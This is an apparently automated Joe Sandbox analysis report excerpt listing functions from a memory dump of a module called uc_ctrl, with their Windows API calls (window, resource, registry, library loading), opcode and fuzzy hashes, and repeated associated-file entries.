Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Text$ItemLengthLongMessageSend_wcslenlstrcmp
String ID:
API String ID: 3501298611-0
Opcode ID: 8d130a65554e12f6c7f3722f066345e64d19eaafd1acf023e5d10009c151d7c9
Instruction ID: 7a864f9863ab938871bf3fba2a65a59a027a92f3717389a57c8d0338c3d8d186
Opcode Fuzzy Hash: 8d130a65554e12f6c7f3722f066345e64d19eaafd1acf023e5d10009c151d7c9
Instruction Fuzzy Hash: 96119331604165FFCF019F64CC05EAE7775EF05324F105216F9699AAE0CB769E14AB82

Function 6CB53C58 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 6CB53C6C

Part of subcall function 6CB56476: GetWindowRect.USER32(?,00000140), ref: 6CB5648A
Part of subcall function 6CB56476: GetParent.USER32(?), ref: 6CB564DE
Part of subcall function 6CB56476: GetParent.USER32(?), ref: 6CB564F2

ScreenToClient.USER32(?,?), ref: 6CB53C94
SetCapture.USER32(?), ref: 6CB53CBE
GetWindowRect.USER32(?,?), ref: 6CB53D02

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ParentRectWindow$CaptureClientCursorScreen
String ID:
API String ID: 3234571238-0
Opcode ID: c32ea37cd411590d37269f2a2f20a931041d43ffbd685c65af630dec58ecead9
Instruction ID: 2a6bdc4a04a9cdb8d5b69a6d22c5e4f7863f00b70a09d08fcddc8f2a34eddd2a
Opcode Fuzzy Hash: c32ea37cd411590d37269f2a2f20a931041d43ffbd685c65af630dec58ecead9
Instruction Fuzzy Hash: FE215971A01209FFDB06DF64C848BEDBBB9FF49315F14025AE80887750EB75A965CB90

Function 6CB345F1 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,00000000,00000005), ref: 6CB34623
LoadResource.KERNEL32(?,00000000), ref: 6CB3462B
LockResource.KERNEL32(?), ref: 6CB34639
FreeResource.KERNEL32(?), ref: 6CB34689

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 014834bd2e75fa444c5e2b0665ce668de50dfc3ffd1b76887868824d7ad17ec7
Instruction ID: 0768bd9ef5b30fc37ba3a72abbbd89245f1df692ff236f710921790753d91eaa
Opcode Fuzzy Hash: 014834bd2e75fa444c5e2b0665ce668de50dfc3ffd1b76887868824d7ad17ec7
Instruction Fuzzy Hash: 5B115330602132EBCB004F41C848BA2FFB8FF0A759F0491A5ED0887A44EB369400DBA1

Function 6CB96FDE Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB96FE8

Part of subcall function 6CB2512A: __EH_prolog3.LIBCMT ref: 6CB25131
Part of subcall function 6CB2512A: GetWindowDC.USER32(00000000,00000004,6CB50443,00000000), ref: 6CB2515D

EnumFontFamiliesExW.GDI32(?,?,6CB96EB0,?,00000000), ref: 6CB97023

Part of subcall function 6CC126D3: __EH_prolog3.LIBCMT ref: 6CC126DA

Part of subcall function 6CC12431: GlobalUnlock.KERNEL32(?,00000000,?,?,6CB97052,?,00000000,0014000C,00000000,?,00000000), ref: 6CC1245F
Part of subcall function 6CC12431: GlobalUnlock.KERNEL32(?,?,?,6CB97052,?,00000000,0014000C,00000000,?,00000000), ref: 6CC12468

EnumFontFamiliesExW.GDI32(00000000,?,6CB96E41,?,00000000,?,00000000,0014000C,00000000,?,00000000), ref: 6CB97078
DeleteObject.GDI32(00000000), ref: 6CB9707F

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EnumFamiliesFontGlobalH_prolog3Unlock$DeleteException@8H_prolog3_ObjectThrowWindow
String ID:
API String ID: 4025682896-0
Opcode ID: 5239bc8a757f74b5be09662842df1debfeb80249073550787fb0b42714a190e1
Instruction ID: 301ba1e8db482a9c8728e1a0bebdfbc9dbc00441ce59235236b6e02ef47b622b
Opcode Fuzzy Hash: 5239bc8a757f74b5be09662842df1debfeb80249073550787fb0b42714a190e1
Instruction Fuzzy Hash: 62115E71905298AEDB11DBB0CC94EEFBB3CAF06348F444065E5096BA50EB709E199B61

Function 6CB28D08 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000000C,?), ref: 6CB28D53
SetBkColor.GDI32(?,?), ref: 6CB28D5D
GetSysColor.USER32(00000008), ref: 6CB28D6D
SetTextColor.GDI32(?,?), ref: 6CB28D75

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Color$ObjectText
String ID:
API String ID: 829078354-0
Opcode ID: 199c3241567be6d8262fa8aecf423f3d75aac430ccc39115406eb52ae49a03a6
Instruction ID: f7db71b190bc366c1091d3048991d222e48e5640ddbac89f3ac5f486f8b780e3
Opcode Fuzzy Hash: 199c3241567be6d8262fa8aecf423f3d75aac430ccc39115406eb52ae49a03a6
Instruction Fuzzy Hash: 77110832602154AB9B00DF7C9C04ABF77B8EF16254F580A0AFD19C7640D735DD0687A2

Function 6CB1D417 Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,00000000), ref: 6CB1D452
RegCloseKey.ADVAPI32(00000000), ref: 6CB1D45B
swprintf.LIBCMT ref: 6CB1D478
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6CB1D489

Part of subcall function 6CB1D1A2: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,6CB1CE9B,?,00000000,00000018), ref: 6CB1D1E7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Close$PrivateProfileStringValueWriteswprintf
String ID:
API String ID: 581541481-0
Opcode ID: fdbdae7e26db9f8d52ab7e0e8c41640d97766f0494236f50b07d421d54334428
Instruction ID: b7404d3a57cf5c02e2ebf6779b963d155e30f392c2952085dfc95cad3fb584e0
Opcode Fuzzy Hash: fdbdae7e26db9f8d52ab7e0e8c41640d97766f0494236f50b07d421d54334428
Instruction Fuzzy Hash: 3301C072A00208BBEB11DE659C85FBF77BCEF4A614F100419FA01A7A40EB71ED1487A0

Function 6CB22163 Relevance: 6.1, APIs: 4, Instructions: 54stringCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 6CB22188
GetWindowTextW.USER32(?,?,00000100), ref: 6CB221B9
lstrcmpW.KERNEL32(?,?), ref: 6CB221CB
SetWindowTextW.USER32(?,?), ref: 6CB221D7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: TextWindow$_wcslenlstrcmp
String ID:
API String ID: 2815616929-0
Opcode ID: d311ece01fda2839409c39cc5ddf21f8b0a5a18d5c3adeeb52ac2afed0a8ab8e
Instruction ID: ed1ae92566017ed8e7bd0f0ead1f52e16826518f31041f2b10fbbcfb7e1fe81d
Opcode Fuzzy Hash: d311ece01fda2839409c39cc5ddf21f8b0a5a18d5c3adeeb52ac2afed0a8ab8e
Instruction Fuzzy Hash: C90196B2601218ABDB00AE64DD4CEEF77BCDB45615F104065EE15D3600EB34DA5497A2

Function 6CC64C59 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6CC64C00,?,00000000,00000000,00000000,?,6CC64E71,00000006,FlsSetValue), ref: 6CC64C8B
GetLastError.KERNEL32(?,6CC64C00,?,00000000,00000000,00000000,?,6CC64E71,00000006,FlsSetValue,6CCB2278,6CCB2280,00000000,00000364,?,6CC639F6), ref: 6CC64C97
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6CC64C00,?,00000000,00000000,00000000,?,6CC64E71,00000006,FlsSetValue,6CCB2278,6CCB2280,00000000), ref: 6CC64CA5

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: b79455458172a09c9bf701f69f6f5bde864ab902ec29f49a5a43f27e56bf9bed
Instruction ID: 40db78df8c3c2a1aaf5c0b569124e7d244ef4d30620434a54a55530ef6356869
Opcode Fuzzy Hash: b79455458172a09c9bf701f69f6f5bde864ab902ec29f49a5a43f27e56bf9bed
Instruction Fuzzy Hash: D5017533B563227BCB11CA6F8D949477BB8AB46BA97240620EA05D7F80EB21D401C6E0

Function 6CC63924 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6CC572F3,?,00000111,?,6CC575BB,00000000,00000111,?,?), ref: 6CC63928
SetLastError.KERNEL32(00000000,00000111,?,?), ref: 6CC63990
SetLastError.KERNEL32(00000000,00000111,?,?), ref: 6CC6399C
_abort.LIBCMT ref: 6CC639A2

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 5b6561e4f2af3289d804f495df35098c84a5cab287f1c7d0b46f108dbe04031e
Instruction ID: 5ea6c973132e138055d128fa6dbd46399c5be2cffaa81e67ac07557fb8906256
Opcode Fuzzy Hash: 5b6561e4f2af3289d804f495df35098c84a5cab287f1c7d0b46f108dbe04031e
Instruction Fuzzy Hash: DFF0CD3164960027D742573B9FD8A5B6E79DFC3B79B2C0524FA2593F80FF25C4064521

Function 6CB2B417 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(00000000), ref: 6CB2B41E
GetTopWindow.USER32(00000000), ref: 6CB2B461
GetWindow.USER32(00000000,00000002), ref: 6CB2B483

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 221a5b0810c5b9e77f84c95101e35922ca7527b60521d1a21dc7afba77408e9a
Instruction ID: 1d36a0e242e92238ad49d84effeb39f095b078be3f9d5aa3e0f8a24035d5c287
Opcode Fuzzy Hash: 221a5b0810c5b9e77f84c95101e35922ca7527b60521d1a21dc7afba77408e9a
Instruction Fuzzy Hash: 5001E932101559ABDF025F90CC48EEF3F35FF16355F048511FA2A56560CB3AC521EBA6

Function 6CB286CF Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,000000F0), ref: 6CB286F3
LoadResource.KERNEL32(?,00000000), ref: 6CB286FF
LockResource.KERNEL32(00000000), ref: 6CB2870C
FreeResource.KERNEL32(00000000,00000000), ref: 6CB28728

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 1a59a84a5ead169a4c674c553c88f8e299ee4bd172e9ffd5a6bf504c95c7be41
Instruction ID: 18b24d711c245b6bd89d0f021736c984c5c65beb75aa037390e152842ced37bb
Opcode Fuzzy Hash: 1a59a84a5ead169a4c674c553c88f8e299ee4bd172e9ffd5a6bf504c95c7be41
Instruction Fuzzy Hash: 53F028377036146B87124F558C8497FBB7DEF56695710002AFE08D7B01CF35CC0286A2

Function 6CB287F2 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6CB287FC
GetTopWindow.USER32(00000000), ref: 6CB28809

Part of subcall function 6CB287F2: GetWindow.USER32(00000000,00000002), ref: 6CB28858

GetTopWindow.USER32(?), ref: 6CB2883D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 9afe7f8e1733bd7f8db4f93d07851939afbc8f65e6c061d225db58ebcfe559f1
Instruction ID: e72ac836b110252639a60ff62213e26bb79dfc0776726afcf91cd01c5e1a4990
Opcode Fuzzy Hash: 9afe7f8e1733bd7f8db4f93d07851939afbc8f65e6c061d225db58ebcfe559f1
Instruction Fuzzy Hash: F40162335026A5ABCB122E628C04ABF3A78EF1639AF088122FD1C99910D73FC51196D2

Function 6CB47FAC Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000030,00000001,00000000,6CB44716), ref: 6CB47FC2
InvalidateRect.USER32(?,?,00000001), ref: 6CB47FE7
InvalidateRect.USER32(?,?,00000001), ref: 6CB48010
UpdateWindow.USER32(?), ref: 6CB48024

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: InvalidateRect$UpdateWindow
String ID:
API String ID: 488614814-0
Opcode ID: 3afc94b07e7f0b12d3df94c862592437fe909c5813bef0f550e827cc663d86f2
Instruction ID: 31ff040e069d081dc9d56222836cd59c94b549b607e843007cb4d08ebb728656
Opcode Fuzzy Hash: 3afc94b07e7f0b12d3df94c862592437fe909c5813bef0f550e827cc663d86f2
Instruction Fuzzy Hash: 2C018832216210AFEB118B18CD00F92BBB8FF09312F05455AF59AD76A4C7B1E840DB40

Function 6CB1EC82 Relevance: 6.0, APIs: 4, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

LocalReAlloc.KERNEL32(?), ref: 6CB1EC88
LeaveCriticalSection.KERNEL32(?), ref: 6CB1EC97

Part of subcall function 6CB1FBBF: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBD3

TlsSetValue.KERNEL32(?,?,?,?,00000000), ref: 6CB1ECC7
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6CB1F0C9,6CB1C806,6CB1F0F2,6CB1F81F,6CB19FCD,00000001,00000000,?,6CC51AA6,?,00000001), ref: 6CB1ECFE

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CriticalLeaveSection$AllocException@8LocalThrowValue
String ID:
API String ID: 4202424549-0
Opcode ID: 67b1bb62ef1b70e6a72e21af774cc9624dc3143c62fc949bf3d576381f4b81aa
Instruction ID: 3c7edad5a3e1fd32b48c1acfed310ae6b77e802ff6b90e5abf51fd45981a3a06
